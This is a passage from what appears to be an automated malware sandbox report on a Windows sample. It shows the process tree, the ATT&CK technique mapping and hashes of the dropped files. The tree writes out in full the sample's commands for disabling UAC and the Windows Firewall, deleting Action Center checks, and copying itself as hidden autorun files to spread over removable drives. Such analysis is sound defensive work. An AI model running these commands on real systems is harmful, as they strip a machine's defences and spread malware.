    PID:1808
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f
      4⤵
      PID:3664
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"
    3⤵
    PID:4232
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f
    3⤵
    PID:3260
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f
      4⤵
      PID:1236
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:876
  - - C:\Windows\SysWOW64\reg.exe
      reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f
      4⤵
      PID:2724
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3228
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:4140
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc config upnphost start= auto
    3⤵
    PID:4760
  - - C:\Windows\SysWOW64\sc.exe
      sc config upnphost start= auto
      4⤵
      Launches sc.exe
      PID:4660
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc config SSDPSRV start= auto
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3356
  - - C:\Windows\SysWOW64\sc.exe
      sc config SSDPSRV start= auto
      4⤵
      Launches sc.exe
      PID:4808
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc config browser start= auto
    3⤵
    PID:984
  - - C:\Windows\SysWOW64\sc.exe
      sc config browser start= auto
      4⤵
      Launches sc.exe
      PID:1012
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net start upnphost
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1968
  - - C:\Windows\SysWOW64\net.exe
      net start upnphost
      4⤵
      System Location Discovery: System Language Discovery
      PID:4348
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start upnphost
        5⤵
        
        PID:2964
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net start SSDPSRV
    3⤵
    PID:1692
  - - C:\Windows\SysWOW64\net.exe
      net start SSDPSRV
      4⤵
      PID:3628
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start SSDPSRV
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2992
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net start browser
    3⤵
    PID:4712
  - - C:\Windows\SysWOW64\net.exe
      net start browser
      4⤵
      PID:3496
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start browser
        5⤵
        
        PID:4640
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4824
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall set currentprofile state off
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:4376
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    PID:2260
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
      4⤵
      Modifies firewall policy service
      System Location Discovery: System Language Discovery
      PID:3052
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    PID:1488
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
      4⤵
      PID:3652
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5024
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
      4⤵
      PID:3132
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1372
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall set currentprofile state off
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:4188
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f
    3⤵
    PID:3544
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f
      4⤵
      Modifies Internet Explorer settings
      PID:3380
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f
    3⤵
    PID:4980
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f
      4⤵
      Modifies Internet Explorer settings
      PID:4252
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f
    3⤵
    PID:2248
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      PID:2328
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f
    3⤵
    PID:1272
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      PID:628
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f
    3⤵
    PID:1808
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f
      4⤵
      Modifies Internet Explorer settings
      PID:3116
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4124
  - - C:\Windows\SysWOW64\reg.exe
      reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f
      4⤵
      PID:920
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f
    3⤵
    PID:2312
  - - C:\Windows\SysWOW64\reg.exe
      reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f
      4⤵
      PID:1416
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe"
    3⤵
    - Modifies Internet Explorer settings
    PID:2712
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe"
    3⤵
    PID:2844
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"
  2⤵
  PID:3484
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:772
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f
    3⤵
    PID:2504
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3420
- - C:\Windows\SysWOW64\reg.exe
    reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f
    3⤵
    PID:1960
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1304
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    PID:1640
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c sc config upnphost start= auto
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4080
- - C:\Windows\SysWOW64\sc.exe
    sc config upnphost start= auto
    3⤵
    - Launches sc.exe
    PID:2044
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c sc config SSDPSRV start= auto
  2⤵
  PID:3108
- - C:\Windows\SysWOW64\sc.exe
    sc config SSDPSRV start= auto
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2284
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c sc config browser start= auto
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1236
- - C:\Windows\SysWOW64\sc.exe
    sc config browser start= auto
    3⤵
    - Launches sc.exe
    PID:2024
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c net start upnphost
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3324
- - C:\Windows\SysWOW64\net.exe
    net start upnphost
    3⤵
    PID:3664
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start upnphost
      4⤵
      PID:1272
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c net start SSDPSRV
  2⤵
  PID:4640
- - C:\Windows\SysWOW64\net.exe
    net start SSDPSRV
    3⤵
    PID:3984
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start SSDPSRV
      4⤵
      PID:4504
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c net start browser
  2⤵
  PID:2476
- - C:\Windows\SysWOW64\net.exe
    net start browser
    3⤵
    PID:2588
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start browser
      4⤵
      PID:1060
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
  2⤵
  PID:2900
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1404
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1752
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    - Modifies firewall policy service
    - System Location Discovery: System Language Discovery
    PID:2164
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1012
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    PID:2724
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
  2⤵
  PID:2640
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1588
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
  2⤵
  PID:3204
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1808
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f
  2⤵
  PID:3332
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    PID:1040
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4460
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f
    3⤵
    - Modifies Internet Explorer settings
    PID:3868
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f
  2⤵
  PID:3844
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f
    3⤵
    - Modifies Internet Explorer settings
    PID:4248
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2104
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f
    3⤵
    - Modifies Internet Explorer settings
    PID:3608
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f
  2⤵
  PID:4780
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Internet Explorer settings
    PID:4948
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2488
- - C:\Windows\SysWOW64\reg.exe
    reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2620
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4200
- - C:\Windows\SysWOW64\reg.exe
    reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f
    3⤵
    PID:4140
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe"
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:4636
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4636 CREDAT:17410 /prefetch:2
    3⤵
    - Loads dropped DLL
    - Adds Run key to start application
    - Drops autorun.inf file
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:5100
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\autorun.inf"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5092
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +R +H "C:\autorun.inf"
        5⤵
        Sets file to hidden
        Drops autorun.inf file
        Views/modifies file attributes
        
        PID:4464
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\autorun.inf"
      4⤵
      PID:2356
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +R +H "F:\autorun.inf"
        5⤵
        Sets file to hidden
        Drops autorun.inf file
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:2084
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c attrib -R -H "C:\protect.bat"
      4⤵
      PID:1040
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib -R -H "C:\protect.bat"
        5⤵
        Views/modifies file attributes
        
        PID:3508
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c attrib -R -H "F:\protect.bat"
      4⤵
      PID:772
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib -R -H "F:\protect.bat"
        5⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:3880
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\daemon.exe" "F:\protect.bat"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2972
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\daemon.exe" "C:\protect.bat"
      4⤵
      PID:3868
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\protect.bat"
      4⤵
      PID:3204
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +R +H "F:\protect.bat"
        5⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2356
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\protect.bat"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2288
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +R +H "C:\protect.bat"
        5⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2640
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4636 CREDAT:82950 /prefetch:2
    3⤵
    - Loads dropped DLL
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:3564
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
1⤵
PID:2256

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
471B

MD5
ed05e58945ed7a2c9b1cdfc86642b6ed

SHA1
57c72c87f05d91b39f235af6688c13c8d9749c67

SHA256
c4e101f22a067b19a4629a48e893f9cd842b9a709a979208c9c5bb06724124ab

SHA512
853107d0ed6191d3a79e2e31d2b41873ccc67ac8bddaeb4ba902cc27342a5bbb127ed98828fa499e1f898d6304da2a05b93457490873f44b5987df780801ef8a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
404B

MD5
09dd6679de340cabe43e3cc250d6dfe1

SHA1
5e9d8ce96ecbf32d51a36564419efd7cce50151a

SHA256
93f919b923bf67140aac1517c06a399b268cca8e7d1585d67c96a361a95c4817

SHA512
de2291e2499b33096f758514e4c9c6aa8a16af7cbbf7bf14ed843f17097500159c038af6398b98faab38a45cd54987d686ecdffccf672a48cc38790ad850ae5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\T1CTRFUW\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Roaming\daemon.exe

Filesize
275KB

MD5
ef1d48e8226e491133525df0e4d44dea

SHA1
16295c3ea0c8ba71edf39bc2627093d7c4a64cfc

SHA256
b2f9228bc717b88b83c990ebcb8e30dafd7748e1c927c23a305ac8ec29298039

SHA512
d2d701ea7ec2edccf334c57295ef4fe055ad3607772424c0194295ddd3a8c4a783586462afc48a36ce3a8174997ce4c4cf11676b65453e0da878c9edc2b9c3b6

Download Submit
C:\Users\Admin\AppData\Roaming\rundx.dll

Filesize
189KB

MD5
a01432e980fe9219321ddd236a3d04e1

SHA1
0297fa99366a537280bb4a2f6ee56a9c222c675b

SHA256
2bba62cf51afb5811c87b14039a700bd7abce57f8bbf623e154a7faedef05867

SHA512
22fd99b879f62295d1459a573559f61dc1a59fcb225a7c59d566d64229139674cb22bd2ec3abb9245f849ea6254a62ef123176308ee54a89e6b10b83ecb66c92

Download Submit
C:\autorun.inf

Filesize
63B

MD5
f64baf418f685884efec59a9d80bc5f6

SHA1
9c90f7a7efd7ef3059837fdeb06b6b781ca6d1e9

SHA256
4b9870b1f52e252451b3fa099e8b270c32ddc6fc29372067be28dcd009ec4e8f

SHA512
dceecd6a564c974c71ceeb544b0dfde70a09315db6d72a50fdbecdc0cf505a7ce52b7a83a9a8c79e8cfbb996c054585da6d7c08bf0026b4d9ecdde5f0a2b2a69

Download Submit
memory/3036-218-0x0000000000590000-0x00000000005E4000-memory.dmp

Filesize
336KB

Download
memory/3036-0-0x0000000000590000-0x00000000005E4000-memory.dmp

Filesize
336KB

Download
memory/3036-8-0x0000000000590000-0x00000000005E4000-memory.dmp

Filesize
336KB

Download
memory/3036-1-0x0000000010000000-0x0000000010053000-memory.dmp

Filesize
332KB

Download
memory/4260-27-0x0000000000590000-0x00000000005E4000-memory.dmp

Filesize
336KB

Download
memory/4260-177-0x0000000003DE0000-0x0000000003DE1000-memory.dmp

Filesize
4KB

Download
memory/4260-194-0x0000000004040000-0x0000000004073000-memory.dmp

Filesize
204KB

Download
memory/4260-426-0x0000000000590000-0x00000000005E4000-memory.dmp

Filesize
336KB

Download